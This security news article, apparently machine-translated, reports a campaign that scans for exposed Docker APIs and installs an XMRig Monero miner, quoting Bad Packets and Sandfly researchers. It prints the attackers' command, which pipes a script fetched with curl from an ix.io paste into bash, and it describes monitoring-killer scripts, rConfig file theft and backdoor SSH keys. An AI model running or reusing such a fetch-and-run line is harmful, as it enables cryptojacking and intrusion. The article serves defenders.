Hackers make scans in order to develop one cryptominer on exposed Docker platforms and steal money.
Professionals behind her hacking campaign
According to researchers, the mass scanning campaign launched on the weekend of November 24. It immediately caught the researchers' attention because of its vast area.
Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.
“What set this campaign apart was the wide scan range. This in itself required further research to find out where this was targeted botnet"He said.
What information do we have so far?
For now, researchers have discovered that the hacking team, responsible for this campaign, has already scanned more than 59.000 IP networks (netblocks) looking for exposed Docker platforms.
If a vulnerable machine is detected, the hackers use the endpoint API to start one Alpine Linux OS container, where they execute the following command:
chroot / mnt / bin / sh -c 'curl-sL4 http://ix.io/1XQa | bash;
This command downloads and executes one Bash script from the intruder server. This script then installs one crypotminer XMRRig. According to Mursch, during the weekend, hackers stole 14,82 coins Monero (XMR), worth just 740 dollars.
Another thing that researchers have noticed is that malicious software that the hackers install, has one self-defense measure.
“One unique but interesting function of this campaign is that it does uninstall known monitoring programs and "kill" various processes, via a script downloaded from http: // ix [.] io / 1XQh, ”Mursch said.
In addition, Mursch discovered that the malicious script has another function, which scans the infected computer by searching rConfig configuration files. The script encrypts and steals them archives and sends them to the attackers' command and control server.
Craig H. Rowland, founder of Sandfly Security, also noted that hackers create backdoor accounts in hacked containers and leave behind SSH keys to make them easier access and be able to remotely control all infected bots.
At present, Mursch proposes to all of them users and companies running Docker platforms to check if there are exposed API endpoints on the Internet and to act immediately.